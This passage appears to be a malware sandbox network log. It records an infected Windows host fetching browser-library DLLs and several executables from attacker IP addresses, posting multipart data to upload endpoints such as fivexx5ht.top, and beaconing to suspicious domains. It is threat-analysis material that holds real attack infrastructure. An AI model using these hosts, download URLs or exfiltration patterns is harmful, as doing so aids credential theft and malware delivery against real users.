ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "a7550-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 685392
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/mozglue.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "94750-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 608080
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "6dde8-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 450024
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/nss3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "1f3950-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 2046288
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/softokn3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "3ef50-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 257872
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
ETag: "13bf0-5e7e950876500"
Accept-Ranges: bytes
Content-Length: 80880
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FHDHCAAKECFIDHIEBAKF
Host: 185.215.113.17
Content-Length: 947
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDBGDHIIDAEBFHJJDBFI
Host: 185.215.113.17
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2408
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIIIECAAKECFHIECBKJD
Host: 185.215.113.17
Content-Length: 265
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDA
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HCBGDGCAAKJEBFIDBAAA
Host: 185.215.113.17
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=81
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----CBKFBAECBAEGDGDHIEHI
Host: 185.215.113.17
Content-Length: 272
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:8.8.8.8:53Request53.107.216.95.in-addr.arpaIN PTRResponse53.107.216.95.in-addr.arpaIN PTRstatic5310721695clientsyour-serverde
-
Remote address:8.8.8.8:53Request136.48.133.195.in-addr.arpaIN PTRResponse136.48.133.195.in-addr.arpaIN PTRalatomoinhcom
-
Remote address:8.8.8.8:53RequestFkpKxsaMBthgGNxVAzsoM.FkpKxsaMBthgGNxVAzsoMIN AResponse
-
Remote address:8.8.8.8:53Requestrestores.nameIN AResponserestores.nameIN A89.248.174.171
-
Remote address:8.8.8.8:53Requestr10.o.lencr.orgIN AResponser10.o.lencr.orgIN CNAMEo.lencr.edgesuite.neto.lencr.edgesuite.netIN CNAMEa1887.dscq.akamai.neta1887.dscq.akamai.netIN A92.123.143.185a1887.dscq.akamai.netIN A92.123.143.169
-
Remote address:8.8.8.8:53Request73.144.22.2.in-addr.arpaIN PTRResponse73.144.22.2.in-addr.arpaIN PTRa2-22-144-73deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request208.95.21.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.113.215.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:8.8.8.8:53Requestjirafasaltas.funIN AResponsejirafasaltas.funIN A172.67.193.102jirafasaltas.funIN A104.21.57.227
-
Remote address:8.8.8.8:53Requestthizx13vt.topIN AResponse
-
Remote address:8.8.8.8:53Requestthizx13vt.topIN AResponse
-
Remote address:8.8.8.8:53Requestthizx13vt.topIN AResponse
-
Remote address:8.8.8.8:53Request81.144.22.2.in-addr.arpaIN PTRResponse81.144.22.2.in-addr.arpaIN PTRa2-22-144-81deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request67.113.215.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53RequestHJhaTjOPrjURhc.HJhaTjOPrjURhcIN AResponse
-
Remote address:8.8.8.8:53Requestapi.garageserviceoperation.comIN AResponseapi.garageserviceoperation.comIN A172.67.202.34api.garageserviceoperation.comIN A104.21.69.3
-
Remote address:8.8.8.8:53Requestctldl.windowsupdate.comIN AResponsectldl.windowsupdate.comIN CNAMEctldl.windowsupdate.com.delivery.microsoft.comctldl.windowsupdate.com.delivery.microsoft.comIN CNAMEwu-b-net.trafficmanager.netwu-b-net.trafficmanager.netIN CNAMEdownload.windowsupdate.com.edgesuite.netdownload.windowsupdate.com.edgesuite.netIN CNAMEa767.dspw65.akamai.neta767.dspw65.akamai.netIN A2.22.144.73a767.dspw65.akamai.netIN A2.22.144.81
-
Remote address:8.8.8.8:53Request52.85.147.82.in-addr.arpaIN PTRResponse52.85.147.82.in-addr.arpaIN PTR82-147-85-52vpsdedicru
-
Remote address:8.8.8.8:53Requestpotentioallykeos.shopIN AResponsepotentioallykeos.shopIN A104.21.95.208potentioallykeos.shopIN A172.67.148.102
-
Remote address:8.8.8.8:53Requestnexusrules.officeapps.live.comIN AResponsenexusrules.officeapps.live.comIN CNAMEprod.nexusrules.live.com.akadns.netprod.nexusrules.live.com.akadns.netIN A52.111.227.14
-
Remote address:8.8.8.8:53Request19.247.89.45.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTRResponse1.112.95.208.in-addr.arpaIN PTRip-apicom
-
Remote address:8.8.8.8:53Request102.193.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requesttvexc20ht.topIN AResponsetvexc20ht.topIN A195.133.39.96
-
Remote address:8.8.8.8:53Requestctldl.windowsupdate.comIN AResponsectldl.windowsupdate.comIN CNAMEctldl.windowsupdate.com.delivery.microsoft.comctldl.windowsupdate.com.delivery.microsoft.comIN CNAMEwu-b-net.trafficmanager.netwu-b-net.trafficmanager.netIN CNAMEdownload.windowsupdate.com.edgesuite.netdownload.windowsupdate.com.edgesuite.netIN CNAMEa767.dspw65.akamai.neta767.dspw65.akamai.netIN A2.22.144.73a767.dspw65.akamai.netIN A2.22.144.81
-
Remote address:195.133.48.136:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary81733978
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 413
Host: fivexx5ht.top
ResponseHTTP/1.1 200 OK
date: Fri, 23 Aug 2024 13:56:15 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
Remote address:195.133.48.136:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary89098988
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 71131
Host: fivexx5ht.top
ResponseHTTP/1.1 200 OK
date: Fri, 23 Aug 2024 13:56:18 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
Remote address:195.133.48.136:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary55202201
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 24620
Host: fivexx5ht.top
ResponseHTTP/1.1 200 OK
date: Fri, 23 Aug 2024 13:56:21 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
Remote address:172.67.202.34:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.garageserviceoperation.com
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E92IsjCHrBfZ9B%2F%2FEZ0cMpBj7cvolSokQnO4BUOhrevgvbndhaOnzl%2Fqfh8q0Rbjq3Grh%2Bx2luhOm4lyCsgUN%2B4cT7jYXcahVKwUTr4jH4nHn0AZcVOoNBRr6ITRIWS7kHGGo0bBHjBI4%2F9baOheOQA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b7b9bdbcb6a496a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.202.34:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.garageserviceoperation.com
Content-Length: 158
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iBw7bm1UurG8CKmkjnZdvcu1LCoEH6RveNGQ7XYqi02UdC4tZEFFtIGzyooKkgoOvI3Wyj8QulPJPvskGy%2BuXbJzmLsQlbmU7Jq9VY19DZH2mDAfU70Z3FAAPktqRtCGCP3wQxUx8reXSAqha%2BtGEB4%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b7b9bdc8c26496a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.202.34:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.garageserviceoperation.com
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mp56SHQrlC7kz9Y3nirjUHQqMo%2Bi6ou6P2Y5vjHa1IhnmeyNilJX5drPvZW4MU3pgRwJ%2B04NwSscWuM2%2F9aSzHLYQu%2FEvFnBwm7acDzXcfQNYgzt4yqjsV5g6VmeD0sTe9EEKpCoQRE%2F1X8ff66MLfg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b7b9be50c74496a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.202.34:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.garageserviceoperation.com
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D2op1YlYE0cAXkBol09zoHPoszQ0RFpoRto5xVAy5EQfFtovZzVWLukOGHe1DrTcpbjaGew99AwEznJmZ0i4TpfrlHbH2iS0DJU1Sr8sUcWr%2BXcYHRUCD4zhI4wc%2FZECsH7nIjTELVPhlIt4uDYjkHg%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b7b9beebe86496a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.202.34:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.garageserviceoperation.com
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YWRXhxLvI5l181czELzK0kliGs5LbbIFvy6nmeNYIexhtFD25G2hQn1uzWqrRkax6unzfC0Eka6yv%2FvsbQ%2BrfytNEjiWkBm77QVHpfj2K9TMqJUEMEUB5WKVH9AGt%2FU%2F%2BQFUa8UxJMUqDt6FrwR4kvk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b7b9bf54df2496a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.202.34:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.garageserviceoperation.com
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1fO18d7vDYkZ5hdrPAasQAr5kzNW7n7LiRPqG9rBb9W1qa0pM72lO5Rchd9IKZPaiZIX0f4XrTvzLLGijriEFCeVSDjIEX5JLt9%2FxEJKrVd%2Bbu%2FUfn8bwHx%2BW74aZhNHDc3A0bmkMJPjUVhkfU6R%2Bho%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b7b9c13f907496a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.202.34:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.garageserviceoperation.com
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uTzmg0jTs0gLiJcyrUHZlP1NQ4AHc5o2o0zL9%2BduzlRRUwNUWjITrCNJwL4MfR2ttrjYYOuZCzMGRCQUlqToa2cXq5LlFBUONqvYfiE9U3KyloAJUxI1R06p9SLQWj%2BwUmYqzUlMmZ0sUACETVSduI8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b7b9c630caf496a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.202.34:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.garageserviceoperation.com
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0p1EXzytbEMbqpVph4rFdqZd78Y8hEZt6%2BCPkai%2F%2FiiMNHJ8OqgATjfqYZWNEkmEdP7X0XrH%2B%2F5wy%2FWzJhXkkG26r9pdKs5Nmp9JoKjNmg10ZiOk6xnlAa4VgIyrQRXpkRRTs64hvbDzjL1oiEDK6Zs%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b7b9c6f6a07496a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.202.34:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.garageserviceoperation.com
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zRuwWucmiD0ecagHWWuugHhPKSQG%2BN4V%2BzyqxKbE%2BPS13qxs1NZsnaa3ZrN5pGSHY0jmP0ZARMFr3%2FgcRdnppBiC3SCULPkETGDQ%2F6g1xgN6HWo%2FTxLp4fJPd%2FmPE4rv03I12%2FAPO6hWm6XaGzD7Wqw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b7b9c8add99496a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.202.34:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.garageserviceoperation.com
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dbLyZ6Al8aKGWNeCn3L6oK01QJpmOUMg119tQicd%2F6%2BaW86XxwHCeMII3mpVFWLztdBUxLh1bQt%2BOkBpqbGrK3AT%2BePfel1TEdESMm6fWiVLUTl0gnvS1%2FbHNEkiSkM7wUdxqFupfuf3Sox20wE6Xl8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b7b9cdccb59496a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.202.34:80RequestPOST /CoreOPT/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: api.garageserviceoperation.com
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=POfS8bomZ6BEJnLQ6EPyCh4qNax%2FEyWBa8JYjFqWSI9IsPG1UCRgb1YRFwomXk5WhBJNiXhZ626%2BAxzy6K6bRRtJzOrLVr7gYWbepvfPmE8TAlxEYZIM6RQugeABqCNsh1r%2BB8TPaFtiaESIOZ7YII8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8b7b9ce16861496a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:185.215.113.16:80RequestGET /inc/kitty.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:56 GMT
Content-Type: application/octet-stream
Content-Length: 327168
Last-Modified: Wed, 07 Aug 2024 22:38:53 GMT
Connection: keep-alive
ETag: "66b3f77d-4fe00"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /inc/contorax.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:59 GMT
Content-Type: application/octet-stream
Content-Length: 104448
Last-Modified: Fri, 16 Aug 2024 21:39:51 GMT
Connection: keep-alive
ETag: "66bfc727-19800"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /inc/3546345.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:57:00 GMT
Content-Type: application/octet-stream
Content-Length: 2846145
Last-Modified: Thu, 15 Aug 2024 19:15:23 GMT
Connection: keep-alive
ETag: "66be53cb-2b6dc1"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /soka/random.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:57:05 GMT
Content-Type: application/octet-stream
Content-Length: 1890816
Last-Modified: Fri, 23 Aug 2024 13:52:55 GMT
Connection: keep-alive
ETag: "66c89437-1cda00"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /inc/2.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:57:20 GMT
Content-Type: application/octet-stream
Content-Length: 689664
Last-Modified: Mon, 05 Aug 2024 00:09:39 GMT
Connection: keep-alive
ETag: "66b01843-a8600"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestGET /inc/Channel1.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:57:24 GMT
Content-Type: application/octet-stream
Content-Length: 6660450
Last-Modified: Thu, 22 Aug 2024 18:48:29 GMT
Connection: keep-alive
ETag: "66c787fd-65a162"
Accept-Ranges: bytes
-
Remote address:82.147.85.52:80RequestGET /build2.exe HTTP/1.1
Host: 82.147.85.52
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 13 Aug 2024 17:42:55 GMT
ETag: "78400-61f9423bdc7a0"
Accept-Ranges: bytes
Content-Length: 492544
Content-Type: application/x-msdos-program
-
GEThttp://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgOPD4wTdt7ybsAAA%2F1zLXkX1g%3D%3Daxplong.exeRemote address:92.123.143.185:80RequestGET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgOPD4wTdt7ybsAAA%2F1zLXkX1g%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r10.o.lencr.org
ResponseHTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "5DC134C48C725BC4FB4950EBA5100EB8843ACB2C3D3DB50A7762B9665F929A8C"
Last-Modified: Thu, 22 Aug 2024 12:17:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=13972
Expires: Fri, 23 Aug 2024 17:49:50 GMT
Date: Fri, 23 Aug 2024 13:56:58 GMT
Connection: keep-alive
-
Remote address:8.8.8.8:53Request168.245.100.95.in-addr.arpaIN PTRResponse168.245.100.95.in-addr.arpaIN PTRa95-100-245-168deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestpastebin.comIN AResponsepastebin.comIN A172.67.19.24pastebin.comIN A104.20.3.235pastebin.comIN A104.20.4.235
-
Remote address:8.8.8.8:53Request90.210.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestthizx13vt.topIN AResponse
-
Remote address:8.8.8.8:53Requestraw.githubusercontent.comIN AResponseraw.githubusercontent.comIN A185.199.110.133raw.githubusercontent.comIN A185.199.109.133raw.githubusercontent.comIN A185.199.111.133raw.githubusercontent.comIN A185.199.108.133
-
Remote address:8.8.8.8:53Requestthizx13vt.topIN AResponse
-
Remote address:8.8.8.8:53Requestthizx13vt.topIN AResponse
-
Remote address:8.8.8.8:53Requestthizx13vt.topIN AResponse
-
Remote address:8.8.8.8:53Requestthizx13vt.topIN AResponse
-
Remote address:8.8.8.8:53Request185.143.123.92.in-addr.arpaIN PTRResponse185.143.123.92.in-addr.arpaIN PTRa92-123-143-185deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request24.19.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestthizx13vt.topIN AResponse
-
Remote address:8.8.8.8:53Requestthizx13vt.topIN AResponse
-
Remote address:8.8.8.8:53Request133.110.199.185.in-addr.arpaIN PTRResponse133.110.199.185.in-addr.arpaIN PTRcdn-185-199-110-133githubcom
-
Remote address:8.8.8.8:53Request157.125.218.185.in-addr.arpaIN PTRResponse157.125.218.185.in-addr.arpaIN PTRvmi2094497 contaboservernet
-
Remote address:8.8.8.8:53Request96.39.133.195.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestthizx13vt.topIN AResponse
-
Remote address:185.215.113.19:80RequestGET /inc/meta.exe HTTP/1.1
Host: 185.215.113.19
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:57:18 GMT
Content-Type: application/octet-stream
Content-Length: 2806784
Last-Modified: Tue, 20 Aug 2024 15:50:11 GMT
Connection: keep-alive
ETag: "66c4bb33-2ad400"
Accept-Ranges: bytes
-
Remote address:208.95.112.1:80RequestGET /json HTTP/1.1
Host: ip-api.com
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Python/3.10 aiohttp/3.8.6
ResponseHTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 311
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:195.133.48.136:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary20208759
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 410
Host: fivexx5ht.top
ResponseHTTP/1.1 200 OK
date: Fri, 23 Aug 2024 13:57:40 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
Remote address:195.133.48.136:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary88514854
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 71254
Host: fivexx5ht.top
ResponseHTTP/1.1 200 OK
date: Fri, 23 Aug 2024 13:57:44 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
Remote address:195.133.48.136:80RequestPOST /v1/upload.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data; boundary=----Boundary16327487
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Content-Length: 24620
Host: fivexx5ht.top
ResponseHTTP/1.1 200 OK
date: Fri, 23 Aug 2024 13:57:47 GMT
content-type: text/plain; charset=utf-8
content-length: 2
etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
-
